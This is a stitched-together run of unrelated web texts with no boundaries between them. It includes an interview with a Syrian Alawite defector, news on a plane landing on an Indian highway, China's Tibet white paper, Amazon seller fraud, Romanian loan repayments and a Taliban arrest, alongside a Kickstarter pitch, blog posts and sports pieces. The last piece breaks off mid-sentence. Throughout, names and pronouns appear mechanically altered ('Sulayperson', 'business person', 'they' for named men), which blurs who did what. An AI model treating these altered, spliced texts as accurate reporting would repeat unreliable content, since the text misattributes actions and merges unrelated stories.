The mistake of the opposition, says Sulayperson, is the lack of “sense or understanding of the danger of dealing with the Alawites on the basis that they are the regime's sect that supports it… and consequently, the danger of making the revolution appear as if it were a Sunni revolution.”
“But the reality is different, particularly among the Alawites who have deep-rooted social and political power that is radically contradictory to the approach of the criminal al-Assad family and who paid a high price during the rule of Hafez al-Assad,” Sulayperson says from Paris, where they are finishing a political science degree while serving as the vice president of the Movement for a Pluralist Society.
The movement is a moderate, secular opposition organization, founded in 2012, that is part of the 2016 Geneva peace talks with the Moscow group. “We unfortunately have not seen the fruit from our efforts with an arrival to the stage of serious negotiations,” Sulayperson tells Syria Direct's Fatima al-Jundi.
Q: What compelled you to defect?
The violent way peaceful protests were dealt with at the beginning of the revolution and my unwillingness to participate in the regime's systematic killing of the Syrian people. I also am from a family opposed to the regime that adheres to the philosophy of the deceased Alawite officer Salah Jadid who passed away in Hafez al-Assad's prisons.
[Ed.: Salah Jadid was a political figure in the Baath party and political strongman in Syria from 1966 until 1970. After several years of inter-Baathist power struggles and purges, Salah Jadid and Hafez al-Assad were left as the leaders of two rival blocs within the Baath party. This rivalry heated up after Syria's defeat in the Six-Day War in 1967. Jadid held power among the civilian wing of the Baath Party and whose bloc called for a socialist transformation of Syrian society and aligned with the Soviet bloc. Al-Assad's military-dominated bloc advocated for a strong Arab-nationalist approach that emphasized the need to increase the strength of the Syrian military and cooperate with other Arab countries to take on Israel at the expense of internal socialist agendas. After several years, Hafez al-Assad led a coup against Salah Jadid's civilian bloc and seized power. They imprisoned Jadid in 1970 in Mezzeh prison until their death in 1993. For several years after Hafez al-Assad came to power, they carried out numerous mass arrests and purges of supporters of Salah Jadid, mainly within Alawite communities in Latakia and Tartus.]
Q: How did the rebels treat you while you were still inside Syria? What eventually led you to leave Syria?
After I defected, I spent about nine months with the rebels in Idlib province. The Free Syrian Army (FSA) accepted my presence with them and gave me protection and considered me one of them among their ranks as a fighter. At that time, religious affiliation didn't factor into the relationship between them and me. But after the emergence of the Islamist movements in those areas that carried strange ideas to Syrian society, the most prominent being a-takfir [Ed.: the act of accusing other Muslims of apostasy]. That's when it became difficult for me to stay there and made me leave for Turkey.
Q: How do you see sectarian rhetoric among different circles of the opposition? Has that influenced how satisfied you are with the direction of the revolution?
Up to this point, there aren't elites within the opposition who actually represent the Syrian revolution. That is why I view the rhetoric of a lot of the opposition as not rising to an acceptable standard of national conduct. And moreover, that sectarian rhetoric creates reactions that are detrimental to the revolution.
But despite that, my satisfaction with the revolution hasn't changed. My belief is that those people do not represent Syrian society. Their conduct comes from a desire to implement specific agendas and this will fail because our society, with all of its different sides, is not fertile soil in which to grow sectarianism and extremism.
Q: Do you think that Bashar al-Assad represents the Alawite sect?
Bashar does not represent the Alawite sect, and the sect does not represent Bashar.  They are a dictator who represents only their own interests. They have abandoned all Syrians, the first being this sect [the Alawites] when they compelled them to wear military fatigues and defend him. There are elites within the sect, many of them, who have been erased from the image of the opposition intentionally to create the general impression that Bashar carries a lot of weight within the sect, but this is just not true.
Q: Who then has benefited during the al-Assad dynasty? Who did the Assads take with them to the top?
There are factions connected to the al-Assad family with many well-known connections, but everyone believes that it is the al-Assad family that truly benefited from [Hafez and Bashar] al-Assad's rule.
The reality is that al-Assad exploited these connections to consolidate their power, either economically with the business people of the largest cities or security-wise, such as with the children of the Syrian coast [referring to the Alawite homeland].
Q: Since the rise of extremism in Syria, do you anticipate any reprisal attacks targeting the Alawite sect in the instance that the regime falls?
I rule that out for two reasons. The first and most important goes back to the consciousness of the Syrian people and the absence of anything pushing them towards revenge actions. They know this is what the regime would want in order to completely burn down the country after it falls.
The second reason goes back to the international community's profound interest in protecting minorities and civilians. There are even troops from powerful countries inside Syria, including Russians and Americans, that constitute a big guarantor to implement anticipated political solutions without chaos like this happening.
Q: Recently, several political movements have emerged claiming to represent the Alawite sect, such as al-Wathiqa al-Alawiyya, Ghad Suriya and the New Alawites. Why have they appeared now and what is the importance of the timing?
These groups express the opinion of my community. But most of them have been strangled and erased by the regime since the beginning of the struggle in Syria in 2011 in collaboration with the actions of regional states that supported the revolution.
Rebel forces adopted this movement [excluding the Alawite opposition] without any sense or understanding of the danger of dealing with the Alawites on the basis that they are the regime's sect that supports it… and consequently, the danger of making the revolution appear as if it were a Sunni revolution.
But the reality is different; particularly among the Alawites who have deep-rooted social and political power that is radically contradictory to the approach of the criminal al-Assad family and who paid a high price during the rule of Hafez al-Assad.
Hafez al-Assad crushed these Alawites throughout their rule. And when they tried to remobilize from scratch at the beginning of the Syrian revolution during the era of the son, Bashar al-Assad, the behavior of the regime was calculated that it helped to obstruct these powers [within the Alawite community]. This is especially true given that the Alawites were dealt with on the basis of political affiliation and exploitation without any interest in them or giving them any support, even in the media.
These movements [such as al-Wathiqa al-Alawiyya, Ghad Suriya and the New Alawites] came as a response to the increasing criminality of this regime against the Syrian people, particularly in recent times, and the big losses within the Alawite sect in the continuous fighting in Syria. They call for all sides to bring an end to the war and extremism and head towards a political solution.
I hope that these movements will be an opportunity for all sides to deal with the Alawite reality in a different way and the Syrian reality more generally.
Q: What is the role of the Movement for a Pluralist Society, of which you are a member, in the Syrian equation?
We are a socio-political movement that believes in a political solution as the last and only solution in Syria. However, as you know, we unfortunately have not seen the fruit from our efforts with an arrival to the stage of serious negotiations as of yet.
We are ready at any time to cooperate with any effort that might contribute to ending this conflict and to return Syria and establish a free country where there is dignity and equality between all of its citizens.
Q: What is your position with regard to whether Bashar al-Assad remains in power or is overthrown in the instance a political agreement is reached to end the war in Syria?
Bashar al-Assad remaining in power is impossible. The overthrow of Bashar al-Assad is important to stop the war in Syria and in order to start a political life among Syrians. Consequently, they have no future in Syria.
Q: Do you feel as if you are in exile in France? If the war were to end, would you want to return to Syria?
Yes, I will return to Syria in the instance that there is a political solution. I am not comfortable here in my separation from home. I am not here on vacation, but rather because of the situation in Syria.
The plane is owned by NRI business person Sam Verma.
A four-seater private plane made an emergency landing on a busy highway at Betul, 200 km from Bhopal, in Madhya Pradesh today.The aircraft, owned by NRI business person Sam Verma, landed at Betul-Nagpur National Highway 69 at around 9.30 am this morning, blocking the traffic for more than 30 minutes.Police rushed to the spot and diverted the busy traffic.The plane was supposed to land at the runway inside Mr Verma's tyre factory nearby, but strong wind in the opposite direction forced the pilot to land on the highway. Only the pilot of the aircraft, Jacob, was on board when the plane landed on the highway."The plane was going to land on my private runway near the four-lane highway, but as the wind was too strong, the pilot had to make an emergency landing on the national highway. I have complained to the NHAI as the towers of their toll plaza near my runway create problems in take-off and landing of my aircraft," Mr Verma told NDTV.The aircraft was on the highway for hours as Mr Verma insisted senior officials of the NHAI come and meet them at the spot. However, after a while the cops finally convinced them to move the aircraft. The traffic during this period was diverted to other lanes.The area's Collector told NDTV RK Mishra said, "We will now get the incident probed by the DGCA, and also will be reopening 2007 case against Sam Verma, whose runway is partly built on encroached government land." The administration is now talking of a probe into the cause of this risky landing.
The Chinese government released a white paper on Tibet earlier today denouncing the Dalai Lama whilst lauding the development path Tibet has taken under CCP rule. Titled “Tibet's Path of Development Is Driven by an Irresistible Historical Tide“, the document was released by the Information Office of the State Council.
Having previously accused the Dalai Lama of terrorism and of profaning Buddhism, China has again openly attacked the exiled spiritual leader in this latest white paper, blaming them for manipulating Tibetans and encouraging violence in the contested region. The Tibetan's spiritual leader is accused of publishing a “self-Immolation guide”, which the paper describes as “an instruction manual to incite Tibetans in China to burn themselves” and through which they are “duping” them into believing it is “martyrdom”.
The paper then proceeds to attack the “Middle Way” approach, an attempt at compromise by the Dalai Lama which seeks to give Tibetans autonomy over all matters except diplomacy and defence. The white paper claims its essential intent is to split China by feigning acceptance of Chinese sovereignty so “Tibetan independence” forces can establish a “state within a state” and ultimately effect secession once its governing power is consolidated. The white paper takes particular issue with the Dalai Lama's denial of Tibet being part of China since ancient times; their urging for parts of neighbouring province to be incorporated into the “Greater Tibet” unified administrative region; and their calls for the exclusion of non-Tibetan ethnic groups and withdrawal of Chinese troops so the province may become a “zone of peace”. The paper describes the “Middle Way” as antithetical to “China's history, national reality, state Constitution, laws and basic systems.”
This latest political machination from Beijing may stoke tensions in the notoriously turbulent region. Last week, a CCP official announced Buddhist monks would be tested for “patriotism”, while new rules demanding Chinese national flags be installed at monasteries would be enforced in Tibet. As the Dalai Lama continues to age and Tibet remains firmly under Chinese rule, observers have been leaning in closely to see whether this renewed condemnation of the Tibetan independence movement causes more restlessness.
By Liam Bourke
Share this: Pocket
Telegram
Print
Whatever the weather is, no matter how sleepy you are, Monday is Monday. It's necessary to be in a good shape in order to generate new ideas and to be in trend. API2Cart strives to make developers' Mondays more tolerable presenting interesting and informative API digest. Keep up with the times and stay aware of all API news.
No one argues that ensuring the scalability and longevity of API is highly crucial. But when developers agonize over your API trying to understand something, it doesn't contribute to a joyful process. API Best Practices: Response Handling, written by Mike Stowe, covers how to ensure that programmers understand what happens with the API request. Using the appropriate Status Code and returning error message when the call is failed is just as crucial as scalability.
IoT appears to be, probably, one more dizzying and in the same time exciting issue among the community. Discover Internet of Things — The Space Junk Challenge, interesting comparison of IoT platforms and satellites written by Dez Blanchfield.
How to build an effective API program that aligns with the business goals? Go through the article Building Effective API Programs: API Business Models to find the answer. The post is written by Manfred Bortenschlager, as usual, they smartly cover the topic providing their expert opinion.
Predictions are always tough. However, Steven Willmott has done their best to make API Predictions 2015. Explore the article to see what they have got.
Have you ever asked yourself a question that Johan Swanepoel did: “How can I help my clients build the services that their customers demand in simpler, better and faster ways?” Go through the article API economy and mobile: What it means for your government organization where they share their opinion.
REST vs SOAP - endless battle. What are their main features, what makes them different? Find the answer in Is REST better than SOAP? Yes, in Some Use Cases, written by Bruno Pedro. Their work will help you to understand the differences better.
P.S. By the way, Nordic APIs infographic is like a piece of art showing the REST vs SOAP comparison.
Don't hesitate to suggest some other posts, as I'm sure that there are more interesting articles concerning API. And in case you have any questions about API2Cart and its unified API, schedule a FREE Call with our representative.
The Problem
The Hookie Do will change the way you install hair extensions!
Wearing hair extensions is one of the best beauty secrets any person can have. It gives the wearer versatility in length, color, texture, and density and it also allows people to protect their natural hair from harsh styling practices that may involve heat and chemicals.
Despite the convenience of having hair extenions, installing hair extensions isn't convenient at all! The most popular ways involve sharp needles which can poke one's scalp and glue which can damage both the extensions and the wearer's natural hair. The process is also tedious and can take hours to install. A professional can usually install hair extensions in about an hour to two hours and their service can cost hundreds of dollars for just the installation!
Non-professionals who opt to save money by doing it themselves, often spend their whole day installing the hair extensions--- that means they take a whole day off of work, just to spend it away from their family and friends in order to do their hair.
“There has to be a better way…”
The Solution : The Hookie Do
The Hookie Do
The Hookie Do (TM) is a patent-pending hair extension apparatus that enables people to install hair extensions without any needle or glue! Made of flexible and light weight material, the Hookie Do features hooks on the outside and hair combs on the inside.
How does it work?
You'll need an HTML5 capable browser to see this content. Play Replay with sound Play with
sound 00:00 00:00
The Hookie Do has hooks on the outside and combs on the inside. Simply hook the wefts of the hair extensions onto the hooks, and you will create a new hair unit in minutes. With the combs, you will then clip the Hookie Do into your hair.
Youtube Tutorial
Hookie Do YouTube Tutorial
The Hookie Do clip into one's head without hair extensions installed.
What color is it?
Currently the Hookie Do is only in the color black. With your support, by preordering your first Hookie Do, we will be able to add more colors as we invest profits into further research and development.
Does the Hookie Do work with all textures of hair extensions?
Yes!
How long will the average cap last?
The longevity of a Hookie Do is dependent on one's care of it. On average, the Hookie Do should last for at least a year.
What size is the Hookie Do?
The Hookie Do is one size fits all.
How many combs are there?
The Hookie Do has 5 combs inside. They are strategically place to provide the most comfortable fit and most firm grip.
Is the Hookie Do bulky?
The Hookie Do do not appear bulky once the hair extensions have been installed and styled.
How much natural hair leave out is required?
You should leave about 3x2 inches of leave out in the shape of a U. You also should leave out your edges.
How can you help make the Hookie Do the most versatile and most natural looking method to install hair extensions?
The proof that the concept of the Hookie Do works is proven in the video and the pictures on the Kickstarter. Clearly, you see the inventor wearing it and if you were to see them in person you would not have guessed that their hair extensions were installed in any other way than a DEW in. It looks just like a DEW in!
But do you want to see the Hookie Do in a variety of colors with a variety of options for leave out (u-shape, l-shape, no leave out)? Do you want the Hookie Do to have “absoloutely no detection” to the point where the Hookie Do itself (not the hair, but THE Hookie Do) looks like it grows out of your scalp? If so, please understand that this requires further research and development, which requires more money to hire engineers for prototyping. The Hookie Do cannot reach these steps without your monetary support. If you pledge at least 45 dollars you will be rewarded with a Hookie Do of your very own which works incredibly well and will save you money and time now. Your support will help lead to further innovative Hookie Do styles.
**The length of the wefts for hair extensions vary by company and thus we cannot garuantee how much hair you may need to get a full look. After testing virgin (unprocessed) hair we recommend 3 or more packs of hair, and after testing store bought non-virgin (processed) hair we recommend 2. Please note that you can skip rows of hooks giving you the choice of how full you want your hairstyle to be. Generally you should focus on making sure the middle and top sections are the fullest. The lower back does not have to be as full because the lower back will be covered by the layers of hair above it. The brown hair showed in the video was three packs of virgin hair, and some rows were skipped--- still the hairstyle looked full! The blue and pink hairstyle was 2 packs of hair.**
Why is The Hookie Do better than other methods?
You'll need an HTML5 capable browser to see this content. Play Replay with sound Play with
sound 00:00 00:00
Hair extensions installed onto the Hookie Do
FAST INSTALL
Hooking hair extensions onto the Hookie Do takes about 30 minutes!
The first time you install hair extensions to your Hookie Do should be the longest. That's because you are learning which way you should hook your wefts (some areas you may want fuller than others). After you have familiarized yourself with which pattern you want to follow, it should be faster for you to hook your wefts. After you have finished just clip in the Hookie Do and blend it with your natural hair!
Quick Uninstallation!
Just unclip the combs of the Hookie Do from your hair and then unhook the wefts from the hooks. Literally it takes seconds!
Easy!
It is so easy to install hair extensions to the Hookie Do that even a child can do it. Again, just take the weft hair extensions and hook! Learning how to tie shoe laces is harder.
Allows you to enjoy hair extensions from all of your favorite hair companies!
Other methods that claim to expedite the process of installing hair extensions often (if not always) require that you also wear the hair of the said company (because the method is incorporated with the hair, ex. clip-in extensions or a wig) . This dramatically limits your options of what type of hair extensions you can wear! With the Hookie Do you can still enjoy your favorite weft hair extensions no matter what company they are from!
NO NEEDLE! NO GLUE! JUST HOOK!
The Hookie Do do not require any needle or glue to install hair extensions. No more poking your scalp and fingers with needles! No more ruining your natural hair and expensive hair extensions because of messy glue.
And if you are a parent with a small child, no more worrying about losing a sharp needle and double-checking to see if you have safely put it away. Throw away the needles!
Just hook your extensions!
One Hookie Do leads to Infinite Amounts of Hairstyles !
Switch Your Color Up!
The Hookie Do is so easy, quick, and convenient you can literally install one set of hair extensions, uninstall the same set of hair extensions, and install new hair extensions in one day... actually you can do that multiple times throughout the day.
Have you ever found yourself not being able to color your hair extensions the color you want because of a job? With the Hookie Do you can wear a conservative hair color at work, and then switch to a bright beautiful non-traditional color such as pink or green when you're off.
Perhaps you may not want to do this everyday, but you will always have the option and having options is never a bad thing!
One Hookie Do will save you hundreds of dollars!
With the Hookie Do you can make your own units!
The Hookie Do cut the amount of money someone pays for an installation dramatically. Some hair stylists charge as low as 50 dollars for a DEW in or quick weave but most charge $100 or more. This affords you only ONE installation!
With the Hookie Do you just pay ONE time and install and uninstall extensions as many times as you like. NO NEEDLE! NO GLUE! JUST HOOK!
How will the money be used?
Full hairstyle with the Hookie Do
Fulfill Orders
First and foremost the money raised for this project will be used to fulfill all orders! The Hookie Do has been in research and development phase for 2 years and we finally have a working prototype. If the goal is met, we can start production to deliver everyone their Hookie Do immediately!
What happens after all orders have been fulfilled?
After all of the orders have been fulfilled, extra money will be used to introduce new styles of the Hookie Do to keep up with the trendsetting hairstyles of today! The Hookie Do cannot further develop into the absolute best, versatile, and undetectable method of hair extensions installation without your support today! Ifyou pledge at least 45 dollars you will receive your very own Hookie Do which clearly works as a great and convenient way to install hair extensions!
About the creator
Demajali West, Georgia State University 2014
My name is Demajali West and I am the inventor of the Hookie Do! Since being a small child I have always been interested in entrepreneurship and have spent many hours thinking of concepts and solutions for products and businesses.
2 years ago I found myself frustrated over the amount of time it took to install hair extensions. I also found that installing hair extensions myself was my only choice because getting them professionally installed was too expensive for me. I wondered how could I make this process faster and easier.
After weeks of brain storming, I finally realized that the wefts of hair extensions can easily hook on... hooks! Taking that idea and combining it with an idea of a u-part wig, I was able to create the Hookie Do!
Life hasn't always been hard but neither has it always been easy, and despite it all I find happiness in “evolving” my mind and spirit. I like to build on top of things, I like to “create”, and I like to see things go from an “idea” to “actual product.” Contributing to something that “grows” is one of the happiest things you could ever do for your soul.
I thank each and every one of you all for visiting my Kickstarter and considering funding my project. I've spent hours smiling over the Hookie Do and thinking of its possible success. I have also spent hours crying over it, stressing over it, and losing sleep only to be comforted by small milestones which remind that all of it has been worth it. I am ready to share Hookie Do with the world!
When the world's largest online retailer allows anyone and everyone to list products for sale without requiring proof of inventory or legitimacy there's always going to be a handful of bad seeds. In the past couple of months, however, instances of Amazon third-party seller fraud have absolutely exploded, and thanks to leaked login credentials of reputable sellers, it's now harder to detect than ever.
If you've visited the Amazon listing for the Nintendo Switch in recent weeks you've probably noticed the huge number of third-party sellers with listings for “Brand New” merchandise at prices well below actual retail. Being the intelligent individual that you are, you know when something is too good to be true and avoided the tempting deal entirely, but not everyone is so skeptical, and lots and lots of people have fallen victim to third-party seller fraud. It's always been a problem on Amazon, but with so many username and password leaks from other sites and services out there, sketchy sellers have begun commandeering the accounts of real, but inactive, sellers and using their good names and positive ratings to con buyers.
Amazon is attempting to crack down on the troubling trend, but it can be hard to spot in some cases. Many of the fake listings, which can be up to $100 or more below retail price for any given item, sometimes come from accounts with 4- and 5-star ratings and long histories of positive transactions. The hacker, using stolen credentials, takes over the account and changes banking information, then places the phony listings, cashing out even before the buyer realizes they've been conned.
As the Wall Street Journal reports, not all of the hacked accounts are dormant ones, and some active sellers have seen their profiles and profits taken over by fraudsters who withdraw their hard-earned cash to brand-new accounts before the account holder has time to react.
So if you're shopping for ridiculously good deals on Amazon, be sure to double-check both the seller's info and your own common sense before swiping your digital credit card.
Amazon has provided the following statement on the matter:
This is my Aegis Reclaimer, the Bourne Eclipse.
Scale: 1/358
Length: 17.4 inch Hull, 19.5 inch including the extended Claw.
Printer: Fusion3d F306 FDM printer for most parts. Shapeways High Definition Acrylate for Turrets and Floodlights.
Full imgur album:
http://imgur.com/a/a5cNJ
Forum post with more description:
https://forums.robertsspaceindustries.com/discussion/361191/3d-printed-aegis-reclaimer-and-custom-paint
I spent about 4 months on the Reclaimer in my spare time. This was my first attempt to custom paint a scale model, so some of that time was learning how the airbrush worked and studying youtube tutorials on painting and weathering techniques. My first large Star Citizen 3D Print was the Starfarer, and I decided to print this at the same scale. The Buccaneer is also printed to the same scale, and has tiny magnets embedded in it for the Reclaimer Claw to hold it.
https://www.thingiverse.com/thing:2020702
'If Turkey could understand we too are people, then I do believe one day our marriage will be legal'
A Turkish gay couple have lost their jobs, evicted from their home and are facing death threats from their family for choosing to get ‘married'.
Ekin Keser, 21, and Emrullah TÃ¼zÃ¼n, 27, say they are afraid for their lives after choosing to commit to each other in a symbolic wedding.
The couple wed on a ferry in Istanbul in September. While it had no legal significance, they hoped publicizing it would challenge views.
‘My family and siblings threaten me with death. When our wedding was featured in the news, our family and friends began rejecting us,' said TÃ¼zÃ¼n, adding their landlord threw them, their dog and two cats.
They said they also used to work as a waiter in Istanbul's KadÄ±köy district.
‘When the threats increased, my boss learned about the situation and I was laid off,' TÃ¼zÃ¼n told Hurriyet Daily News.
‘Ekin is not working, as they are an undergraduate student. I was the only breadwinner, but I lost my job.'
Both men have received death threats on social media, but the biggest reaction has come from their families.
‘We have received the biggest reaction from our families. My family knew that I was homosexual, but they reacted against my marriage,' said Keser.
Speaking to KAOS GL, Keser was asked why they attempted to have a symbolic wedding in a country as homophobic as Turkey.
They said: ‘Yes, there have been people from certain circles who had this kind of attitude, but what made our wedding ceremony special for us was the realization of our dream. Our happiness and excitement was too intense to describe.
‘If it were understood in Turkey that we too are persons, we would have the very rights that are granted to married heterosexual couples. I sincerely believe that this will happen.'
Romania needs to pay EUR 1.26 bln to the EU and the World Bank in 2017
Romania needs to repay over EUR 1.26 billion to the European Union and the World Bank next year from the stand-by loan contracted in 2009, according to data of the Finance Ministry.
Of the total amount, some EUR 1.15 billion represents main repayments, whereas the remaining amount comes from interest rates and fees, reports local Agerpres. Romania needs to reimburse over EUR 1.25 billion to the European Union and only EUR 9 million to the World Bank.
This year Romania has paid EUR 113 million to the EU and the World Bank, representing interest and fees for the loans. The largest part of the amount was reimbursed to the EU, namely EUR 104 million. The World Bank received EUR 9.1 million.
In 2015, Romania repaid over EUR 1.83 billion to the International Monetary Fund (IMF), the European Union, and the World Bank. That year the country managed to reimburse its entire loan from the IMF. The last installment was paid in February and amounted to EUR 165 million. In total, Romania reimbursed over EUR 2.49 billion to the IMF.
Last year, Romania also repaid over EUR 1.65 billion to the EU, of which EUR 1.5 billion represented repayments and the rest of the amount was interest interest and fees.
Between 2009 and 2015, the total amount reimbursed to the three institutions amounted to over EUR 4.8 billion. Over EUR 2.39 billion went to the IMF whereas EUR 2.2 billion was repaid to the EU and EUR 67 million to the World Bank.
Romania still needs to pay over EUR 4.77 billion to the World Bank and the European Union. The largest part of the amount will go to the European Union, namely EUR 3.71 billion.
According to data from Romania's National Bank (BNR), the IMF Executive Board approved Romania's request to conclude a stand-by arrangement for a period of two years in May 2009, for a loan of EUR 12.9 billion.
That year, Romania also took EUR 5 billion from the European Union and EUR 1 billion from the World Bank. The loans helped Romania withstand the effects of the global economic crisis.
Some of the money went to Romania's National Bank and was used to strengthen the country's foreign currency reserves and fight off the local currency's depreciation. The rest of the money went to the Finance Ministry and was used to finance the budget deficit.
editor@romania-insider.com
If you're new here, I'd love for you to sign up for our posts by email so we can stay connected. Thanks for visiting!
If you were browsing through this week's Target ad you may have passed right over the adorable little boy in the bright orange shirt smiling at you on page 9! And if so, I'm glad!
The reason I'm glad? Well, that stylish young man in the orange shirt is Ryan Langston. Ryan just so happened to have been born with Down syndrome, and I'm glad that Target included a model with down syndrome in their typical ad! 🙂
This wasn't a “Special Clothing For Special People” catalog. There wasn't a call out somewhere on the page proudly proclaiming that “Target's proud to feature a model with Down syndrome in this week's ad!” And they didn't even ask them to model a shirt with the phrase, “We Aren't All Angels” printed on the front.
In other words, they didn't make a big deal out of it. I like that.
5 Things Target Said By Not Saying Anything
Even though Target didn't make a big deal out of the fact they used a boy with Down syndrome as a model in their ad, they said plenty. They said the same things that Nordstrom said when they used Ryan as a model in their catalog this past summer. I could list a hundred things Target said by running this ad, let me give you 5 that immediately come to mind:
They said that people born with Down syndrome deserve to be treated the same as every other person on this planet. They said that it's time for organizations to be intentional about seeking creative ways to help promote inclusion, not exclusion. (It's no accident that Target used a model with Down syndrome in this ad; it was an intentional decision. If we want the world to be a place where eeveryone is treated equal we can't just sit around and watch the days tick away. We have to be intentional. We have to do something.) They said that companies don't have to call attention to the fact that they choose to be inclusive in order for people to notice their support for people with disabilities. In fact, by not making a big deal out of it they are doing a better job of showing their support for the special needs community. They said it's important for the world to see people born with disabilities with a fresh set of eyes. That it's time for us to lay down all the inaccurate stereotypes from the past and move forward embracing the future with true and accurate ones They said you don't have to spend a lot for your kids to look good! (I mean come on, that shirt's only five bucks!)
The Future Is Bright
(Our son's pretty cute, huh?) 🙂
One of the reasons I started this site was to give the world an opportunity to see first hand what it's like raising a child born with Down syndrome. I had this crazy idea that if I could give the world a window into the life of a family raising a child with special needs it would help them see that people like my son are much more typical than they may think.
I believe the story we are telling by posting a daily one minute video of our son's story is doing just that.
I also have this crazy dream that together we can use social media to help spread the message that children born with disabilities deserve love, not pity. But I can't do it alone. I need your help. Would you please help spread that message by clicking the ‘like” button that appears right below this post, tweeting this post out to your Twitter followers, and posting it on your Facebook wall? Please be sure to leave your email in the box below and stay up to date on all of our newest posts.
Enter your email address:
The story we are telling is one that we believe needs to be shared. Will you help us share it?
I've never been more excited about the future of individuals born with disabilities. The possibilities are endless, and the future looks bright!
To Target:
As a father of a son born with a disability I want to sincerely thank you. I hope that more companies choose to follow the great example that you guys have set. By choosing to embrace the exciting future and limitless opportunities for people like my son, organizations like yours are leading the way in showing the world that our world isn't forced to live in the past. Thank you Target. By not saying anything, you said a lot.
What do you think about companies who understand the importance of including people born with special needs? When companies do this correctly, like Target and Nordstrom have, does it influence your decision to shop with them more?
That's right, Mobile Magic, our first official Disney Parks app, has hit the iPhone and it's now ready for you to download for free from iTunes.
And Disney Parks and Verizon have another exciting update to share today. If you're a Verizon Wireless customer, you now have access to new premium features, including videos and games within the app.
Verizon Premium Features
More than 100 behind-the-scenes, seasonal, sneak peak videos.
‘Pirates' games that test your knowledge of the famous attraction.
Guess the character before the timer expires with Disney Character Puzzle.
Find out which character is most like you with the Disney Character Quiz.
If you haven't tried the app out yet, you should. It offers accurate wait times as well as official Disney FASTPASS return times and availability for the park you're in. The same system that powers wait times and Disney FASTPASS in the park, powers this app. With the new iPhone version, the wait times are also integrated into the Park maps, making it easier for you to decide where to go next.
Also, there are GPS-enabled park maps to get you to your favorite characters, mobile games and more to explore, including the ability to make dining reservations.
Not an iPhone user? Disney Mobile Magic is also available on a wide variety of feature phones as well as Android phones.
Go try the app and let us know what you think in the comments.
*Message and data rates may apply. Availability subject to handset limitations and features may vary by handset or service provider. Coverage not available everywhere. If you're under 18, get your parents' permission first.
The National Football League, which wants and takes so much from the public, cannot now pass off to the public a one-size-fits-all domestic-abuse policy. The Ray Rice case, for example, is different from the Adrian Peterson case, there being no colloquial tradition of punching women in the face and dragging them out of an elevator.
There is nothing in the dictionary about that.
Unfortunately, especially to our modern sensibilities, there has been a tradition among a certain faction of Americans to quite literally believe that if they spare the rod, they spoil the child. Peterson did not spare the rod. They used a switch on one of their 4-year-olds. Even the word “switch” is loaded with colloquial weight. Peterson did not use an aluminum baseball bat, or an iron bar or a fishing pole. They used a switch, which in the first definition offered by the American Heritage Dictionary is “a slender flexible rod, stick, twig, or the like; especially such a rod used for whipping.”
It isn't until the fifth definition in the dictionary that electrical devices are defined to divert current from one conductor to another.
In the sad months since Peterson was found to have used a switch on their child, we have learned that part of that prehistoric disciplining can even involve the child going out into the back lot and cutting their own switch, implying a dark and layered history that is foreign to those of us who have never used a switch.
It goes across the world, by the way. A friend of mine who is Korean told me, in the aftermath of the Peterson discovery, that when they and siblings acted up, or didn't share, or mouthed off, their mother would assemble the kids and hand one of them a stick.
“Hit me,” they would tell them, “I must be doing a poor job of being a mother.”
That squared them up, they told me.
The point being: Peterson did not deliver a roundhouse right to the jaw of a woman or shoot anybody outside a nightclub. They used a switch on a child as a switch was used on them as a switch was used on their grandfather, the Palestine, Texas, way. They appeared to be bewildered by the attention this received. I suspect that they have not used a switch since, nor will he, there being no evidence that they suffer any greater moral or ethical flaws than any other spoiled, rich, protected and entitled professional athlete.
Last week, Peterson pleaded no contest to misdemeanor reckless assault. It kept them out of jail. It avoided a trial. It might very well get them back on the field, but that is where the National Football League has to decide whether they are going to discard players with a blanket policy or they are capable of deep thinking. I am not sure the NFL is any more capable of introspection than Peterson, but Peterson took responsibility for their switching and apologized, an indication — based on trust, I suppose — that they have to shake off traditional dynamics of a Palestine, Texas, upbringing and allow themselves to be taken into the 21st century.
The child's mother agreed to the plea deal and intends that Peterson continue to have a relationship with their son. And Peterson's wife has accompanied them in all of their public and judicial appointments. This is where a cynic must interject: Why yes, and they all want the money.
It is of little consequence to me if Peterson ever plays again. I have such suspicion about the Wilfs that the fortunes of the Vikings might be the least of my priorities.
But it might be educational if Peterson returned to the field as an example of a man who has been forced to see the light — transformed, we would hope, and now understanding that the switch has gone the way of all other ancient and useless cures.
Joe Soucheray can be reached at jsoucheray@pioneerpress.com or 651-228-5474. Soucheray is heard from 1 to 4 p.m. weekdays on 1500ESPN.
Elise Amendola/Associated Press
The New England Patriots and the Indianapolis Colts will meet for the first time since the 2015 AFC Championship Game—better known as the "Deflategate" game—on Sunday night, and it's a good bet that the Patriots and their fans would like to see this game turn into a blowout.
Count Tom Brady Sr. as one of those people who would like New England to run up the score.
The father of Patriots quarterbacks Tom Brady expressed their thoughts on the Deflategate revenge game to Gary Myers of the New York Daily News. Not surprisingly, they are hoping that their son lights up the scoreboard:
The main thing I want is to see them win. As long as they have one point more than the Colts, I'm fine. That being said, I'd like to see them put 60 points on the board and love to see Tom throw for 500 yards and eight touchdowns. That's me dreaming. That kind of comes from me.
First and foremost, all Brady Sr. cares about is a New England victory. And that result, not the margin of victory, should be the focus for the Patriots. If they are in a position to pour it on, however, they can try to do so during the game.
New England has dropped at least 42 points in each of its past four meetings with Indianapolis and has not won by fewer than 20 points in any of those games. Now that the team has a chance to take out nine months of frustration, this game could also have a lopsided score.
It will be up to the Colts to contain the nearly unstoppable Patriots offense.
A man described as the top Afghan Taliban military commander and named as Mullah Abdul Ghani Baradar has been captured in Pakistan, US officials say. They were seized in a morning raid on a madrassa near Karachi by Pakistan's ISI intelligence service on 8 February, a security source told the BBC. The government has yet to confirm the arrest; the Taliban have denied it. The capture comes amid a major Nato-led offensive against the Taliban in southern Afghanistan. While the raid on Madarassa Khuddamul Quran - near the Nooriabad Industrial Estate some 45km (28 miles) from Karachi - was led by the ISI, it is not clear at the moment whether US officials were involved. Correspondents say Mullah Baradar is reported to be in charge of all long-term strategic military planning for the Taliban in southern Afghanistan and, if confirmed, their arrest will have a very big effect on the Taliban's ability to conduct the insurgency there. ANALYSIS Orla Guerin, BBC News, Islamabad A senior Pakistani military official says this was a joint US-Pakistani operation that was based on shared intelligence. This suggests Pakistan is getting tough with Afghan Taliban leaders sheltering here - something that has long been a demand of the White House. The arrest may also be linked to attempts to get the Taliban into talks with the Afghan government and coalition forces. Mullah Baradar is believed to favour negotiations. There's some speculation here that their detention could be a bid to open channels of communication. It may also be an attempt by Pakistan to influence any future talks. Senior US officials said Mullah Baradar was "providing intelligence". "This operation was an enormous success," one official told ABC News. "It is a very big deal," the official said. The New York Times, citing US government 